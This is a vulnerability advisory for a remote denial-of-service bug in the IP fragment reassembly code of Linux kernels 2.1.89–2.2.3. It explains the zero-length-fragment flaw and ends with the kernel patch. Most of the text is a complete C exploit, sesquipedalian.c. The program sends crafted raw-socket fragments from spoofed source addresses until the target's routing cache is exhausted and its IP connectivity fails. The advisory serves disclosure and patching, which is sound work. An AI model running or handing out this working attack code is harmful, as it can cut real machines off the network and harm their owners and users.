COMMAND

    kernel

SYSTEMS AFFECTED

    Linux kernels 2.1.89 through 2.2.3

PROBLEM

    John McDonald found the following.  The recent release of the Linux
    2.2.4 kernel fixed  a remote denial  of service problem  in the IP
    fragment  handling  code.   If  you  are  running  a  Linux kernel
    between 2.1.89 and 2.2.3, it would probably be a good idea to  get
    the latest version.  The impact  of this problem is that a  remote
    attacker  can  effectively  disable  a  target's  IP connectivity.
    However, for  the attack  to succeed,  the attacker  will have  to
    deliver several thousand packets to the target, which can take  up
    to several minutes.  A quick exploit and the patch are appended to
    the  end  of  this  post.   The  problem  starts  in  ip_glue() in
    ip_fragment.c:

	/* Copy the data portions of all fragments into the new buffer. */
	fp = qp->fragments;
	count = qp->ihlen;
	while(fp) {
		if ((fp->len < 0) || ((count + fp->len) > skb->len))
			goto out_invalid;
		memcpy((ptr + fp->offset), fp->ptr, fp->len);
		if (count == qp->ihlen) {
			skb->dst = dst_clone(fp->skb->dst);
			skb->dev = fp->skb->dev;
		}
		count += fp->len;
		fp = fp->next;
	}

    The problem in this  code is that if  you can get a  fragment into
    the qp->fragments list that  has a length of  0, and is the  first
    fragment in the list, then the call to dst_clone() will happen  an
    extra  time.   The  first  time  through  the  loop,  count   will
    necessarily  equal  qp->ihlen,  causing  dst_clone() to be called.
    However, if  fp->len happens  to equal  0, then  count +=  fp->len
    won't increase it, and the next time through the loop, count  will
    still equal qp->ihlen.   dst_clone() increments a  usage count  on
    an element in the routing cache.  Our 0 length fragment will cause
    this element in the cache to become stranded.  The kernel will not
    free it when it does  the garbage collection of the  cache because
    it will think it is currently in use.  The other component of  the
    problem is that the  call to allocate a  new entry in the  routing
    cache does  a check  to see  if the  hashtable that  comprises the
    cache is  at a  saturated state.   If it  is, it  proceeds to do a
    garbage collection.  If the number of entries in the cache,  after
    this garbage collection, is still higher than the threshold,  then
    dst_alloc() will fail.  So, if we generate enough stranded entries
    in the routing cache (4096 in 2.2.3) via our malicious frags, then
    all further calls to dst_alloc will fail.

    We can get a 0 length fragment into the head of the list by  doing
    the following.  First, send a fragment at offset 0, with a length of
    X, and IP_MF set.  This creates our list.

    Send a 0 length fragment at  offset 0, where the ip header  length
    is equal to the ip total length,  and IP_MF is set.  This will  be
    treated as coming before the fragment already in our list, because
    it has an offset equal to the offset of the existing fragment.  It
    doesn't overlap any,  because its end  is equal to  the following
    fragment's offset.   Send a fragment  at offset X,  with IP_MF not
    set.  This will  mark the end of  our set of fragments.  ip_done()
    will return true because it will  see the first frag going from  0
    to 0, the second going from 0 to X, and the third going from X  to
    the end.   Our fragments will  get passed into  ip_glue().  Here's
    the exploit:

    /*
     * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
     *
     * by horizon <jmcdonal@unf.edu>
     *
     * This sends a series of IP fragments such that a 0 length fragment is first
     * in the fragment list. This causes a reference count on the cached routing
     * information for that packet's originator to be incremented one extra time.
     * This makes it impossible for the kernel to deallocate the destination entry
     * and remove it from the cache.
     *
     * If we send enough fragments such that there are at least 4096 stranded
     * dst cache entries, then the target machine will no longer be able to
     * allocate new cache entries, and IP communication will be effectively
     * disabled. You will need to set the delay such that packets are not being
     * dropped, and you will probably need to let the program run for a few
     * minutes to have the full effect. This was written for OpenBSD and Linux.
     *
     * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    /*
     * On-wire IPv4 header without options (20 bytes).
     *
     * The address fields are in_addr_t (32 bits) rather than unsigned long:
     * on LP64 platforms unsigned long is 8 bytes, which would grow the struct
     * to 32 bytes and make IHLEN / ip_hl wrong.
     *
     * The ip_hl/ip_v bit-field order below places the header length in the
     * low nibble of the first byte as GCC lays bit-fields out on
     * little-endian targets; bit-field layout is implementation-defined.
     */
    struct my_ip_header
    {
	    unsigned char  ip_hl:4,         /* header length */
		    ip_v:4;               /* version */
	    unsigned char  ip_tos;          /* type of service */
	    unsigned short ip_len;          /* total length */
	    unsigned short ip_id;           /* identification */
	    unsigned short ip_off;          /* fragment offset field */
    #define IP_RF 0x8000                    /* reserved fragment flag */
    #define IP_DF 0x4000                    /* dont fragment flag */
    #define IP_MF 0x2000                    /* more fragments flag */
    #define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
	    unsigned char  ip_ttl;          /* time to live */
	    unsigned char  ip_p;                    /* protocol */
	    unsigned short ip_sum;          /* checksum */
	    in_addr_t ip_src, ip_dst;       /* source and dest address */
    };

    /*
     * UDP header: four 16-bit fields.  sendem() overlays this struct on the
     * packet buffer immediately after the IP header.
     */
    struct my_udp_header
    {
	    unsigned short uh_sport;        /* source port; sendem() stores htons(sport) */
	    unsigned short uh_dport;        /* destination port; sendem() stores htons(dport) */
	    unsigned short uh_ulen;         /* length field; sendem() stores htons(64-UHLEN) */
	    unsigned short uh_sum;          /* checksum; sendem() leaves it 0 */
    };

    /* Sizes in bytes of the two header structs, as laid out by the compiler. */
    #define IHLEN (sizeof (struct my_ip_header))
    #define UHLEN (sizeof (struct my_udp_header))

    /*
     * EXTRA is added to the sendto() length of the header-only fragment in
     * sendem(): 8 bytes when compiled on OpenBSD, 0 elsewhere.
     * NOTE(review): presumably works around a minimum packet size enforced by
     * OpenBSD's raw-socket send path -- confirm.
     */
    #ifdef __OpenBSD__
    #define EXTRA 8
    #else
    #define EXTRA 0
    #endif

    /*
     * Compute the 16-bit ones'-complement Internet checksum over a buffer.
     *
     * data   - start of the buffer, read as native-order 16-bit words
     * length - number of bytes to cover; may be odd
     *
     * Returns the complemented sum.  Because the words are read in memory
     * order, the result can be stored straight back into a header field.
     *
     * Differences from the previous version: the accumulator starts at 0
     * (it was uninitialised), carries are folded until none remain (a
     * single fold can itself carry), and an odd trailing byte is padded
     * with a zero byte instead of reading a full word past the buffer.
     */
    unsigned short checksum(unsigned short *data,unsigned short length)
    {
	    unsigned long sum = 0;
	    unsigned short words = length >> 1;
	    unsigned short i;

	    for (i = 0; i < words; i++)
	    {
		    sum += data[i];
	    }

	    if (length & 1)
	    {
		    /* Build the final word as <last byte, 0> in memory order. */
		    unsigned char padded[2];
		    unsigned short last;

		    padded[0] = ((const unsigned char *)data)[length - 1];
		    padded[1] = 0;
		    memcpy(&last, padded, sizeof last);
		    sum += last;
	    }

	    /* End-around carry: keep folding until the sum fits in 16 bits. */
	    while (sum >> 16)
	    {
		    sum = (sum & 0xFFFFUL) + (sum >> 16);
	    }

	    return (unsigned short)(~sum & 0xFFFFUL);
    }

    /*
     * Turn a dotted-quad string or a host name into an IPv4 address.
     *
     * hostname - text to resolve
     *
     * Returns the address in network byte order, widened to unsigned long.
     * Prints a message and exits with status 1 if the name cannot be
     * resolved to an IPv4 address.
     *
     * The address is held in an in_addr_t and compared against INADDR_NONE:
     * storing inet_addr()'s result in a long and testing for -1 never
     * matches where long is 64 bits, so host names were never looked up.
     */
    unsigned long resolve( char *hostname)
    {
	    in_addr_t addr;
	    struct hostent *hp;

	    addr = inet_addr(hostname);
	    if (addr == INADDR_NONE)
	    {
		    hp = gethostbyname(hostname);
		    if (hp == NULL || hp->h_addrtype != AF_INET ||
			hp->h_length != (int)sizeof addr ||
			hp->h_addr_list[0] == NULL)
		    {
			    fprintf(stderr,"Can't resolve target.\n");
			    exit(1);
		    }
		    memcpy(&addr, hp->h_addr_list[0], sizeof addr);
	    }
	    return (unsigned long)addr;
    }

    /* Write the command-line synopsis to stderr, then exit with status 0. */
    void usage(void)
    {
	    static const char synopsis[] =
		    "usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n";

	    fputs(synopsis, stderr);
	    exit(0);
    }


    /*
     * Build and send one set of three IP fragments that share a single
     * IP id, reusing one static buffer for all three sends.
     *
     * s      - socket descriptor passed to sendto()
     * source - value stored in the IP source address field
     * dest   - value stored in the IP destination field and in sa.sin_addr
     * sport  - UDP source port (host order; converted with htons here)
     * dport  - UDP destination port (host order; converted with htons here)
     *
     * Calls perror() and exits with status 1 if any sendto() fails.
     */
    void sendem(int s, unsigned long source, unsigned long dest,
		    unsigned short sport, unsigned short dport)
    {
	    static char buffer[8192];
	    struct my_ip_header *ip;
	    struct my_udp_header *udp;
	    struct sockaddr_in sa;

	    /* Destination address handed to every sendto() below. */
	    bzero(&sa,sizeof(struct sockaddr_in));
	    sa.sin_family=AF_INET;
	    sa.sin_port=htons(sport);
	    sa.sin_addr.s_addr=dest;

	    /* Clear the IP header plus the 32 payload bytes used by the sends. */
	    bzero(buffer,IHLEN+32);

	    /* Overlay the header structs on the buffer: IP first, UDP after it. */
	    ip=(struct my_ip_header *)buffer;
	    udp=(struct my_udp_header *)&(buffer[IHLEN]);

	    /* Fields common to all three fragments; only ip_len, ip_off and
	       ip_sum are rewritten between sends. */
	    ip->ip_v = 4;
	    ip->ip_hl = IHLEN >>2;  /* header length in 32-bit words */
	    ip->ip_tos = 0;
	    ip->ip_id = htons(random() & 0xFFFF);
	    ip->ip_ttl = 142;
	    ip->ip_p = IPPROTO_UDP;
	    ip->ip_src = source;
	    ip->ip_dst = dest;
	    udp->uh_sport = htons(sport);
	    udp->uh_dport = htons(dport);
	    udp->uh_ulen = htons(64-UHLEN);
	    udp->uh_sum = 0;

	    /* Our first fragment will have an offset of 0, and be 32 bytes
	       long. This gets added as the only element in the fragment
	       list. */

	    ip->ip_len = htons(IHLEN+32);
	    ip->ip_off = htons(IP_MF);
	    ip->ip_sum = 0;         /* must be zero while the checksum is computed */
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	    if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }

	    /* Our second fragment will have an offset of 0, and a 0 length.
	       This gets added to the list before our previous fragment,
	       making it first in line. */

	    ip->ip_len = htons(IHLEN);
	    ip->ip_off = htons(IP_MF);
	    ip->ip_sum = 0;
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN);

	    /* ip_len and the checksum cover IHLEN bytes, but IHLEN+EXTRA bytes
	       are handed to sendto(). */
	    if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }

	    /* Our third and final frag has an offset of 4 (32 bytes), and a
	       length of 32 bytes. This passes our three frags up to ip_glue. */

	    ip->ip_len = htons(IHLEN+32);
	    ip->ip_off = htons(32/8);       /* offset is in 8-byte units; IP_MF clear */
	    ip->ip_sum = 0;
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	    if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }
    }

    /*
     * Entry point.
     *
     * Options: -s sport, -d dport, -n count, -u delay (microseconds passed
     * to usleep).  Two positional arguments follow: source and target.
     *
     * Opens a raw socket with IP_HDRINCL set, then calls sendem() count
     * times, sleeping after every second call and printing a progress dot
     * every 100 calls.  Returns 0 on completion; exits with status 1 if the
     * socket cannot be created or configured.
     */
    int main(int argc, char **argv)
    {
	    int sock;
	    int on=1,i;
	    unsigned long source, dest;
	    unsigned short sport=53, dport=16384;
	    int delay=20000, count=15000;

	    if (argc<3)
		    usage();

	    while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
	    {
		    switch (i)
		    {
			    case 's': sport=atoi(optarg);
				      break;
			    case 'd': dport=atoi(optarg);
				      break;
			    case 'n': count=atoi(optarg);
				      break;
			    case 'u': delay=atoi(optarg);
				      break;
			    default:  usage();
		    }
	    }

	    argc-=optind;
	    argv+=optind;

	    /* Options may have consumed the arguments counted by the check
	       above; make sure both positional arguments are really present
	       before dereferencing argv[0] and argv[1]. */
	    if (argc<2)
		    usage();

	    source=resolve(argv[0]);
	    dest=resolve(argv[1]);

	    /* time() takes a pointer; NULL means "just return the value". */
	    srandom((unsigned int)time(NULL)*(unsigned int)getpid());

	    if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
	    {
		    perror("socket");
		    exit(1);
	    }

	    if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
	    {
		    perror("setsockopt: IP_HDRINCL");
		    exit(1);
	    }

	    fprintf(stdout,"\nStarting attack on %s ...",argv[1]);

	    for (i=0; i<count; i++)
	    {
		    /* htonl(i) is added to the network-order source value, so
		       each iteration uses a different source address. */
		    sendem(sock,source+htonl(i),dest,sport,dport);
		    if (!(i%2))
			    usleep(delay);
		    if (!(i%100))
		    {
			    if (!(i%2000))
				    fprintf(stdout,"\n");
			    fprintf(stdout,".");
			    fflush(stdout);
		    }
	    }

	    fprintf(stdout,"\nDone.\n");
	    return 0;       /* normal completion is not an error */
    }

SOLUTION

    Upgrade to kernel 2.2.4.  Here is the patch:

    --- linux-2.2.3/net/ipv4/ip_fragment.c  Wed Mar 24 22:48:26 1999
    +++ linux/net/ipv4/ip_fragment.c        Wed Mar 24 22:44:24 1999
    @@ -17,6 +17,7 @@
      *             xxxx            :       Overlapfrag bug.
      *             Ultima          :       ip_expire() kernel panic.
      *             Bill Hawes      :       Frag accounting and evictor fixes.
    + *             John McDonald   :       0 length frag bug.
      */

     #include <linux/types.h>
    @@ -357,7 +358,7 @@
	    fp = qp->fragments;
	    count = qp->ihlen;
	    while(fp) {
    -               if ((fp->len < 0) || ((count + fp->len) > skb->len))
    +               if ((fp->len <= 0) || ((count + fp->len) > skb->len))
			    goto out_invalid;
		    memcpy((ptr + fp->offset), fp->ptr, fp->len);
		    if (count == qp->ihlen) {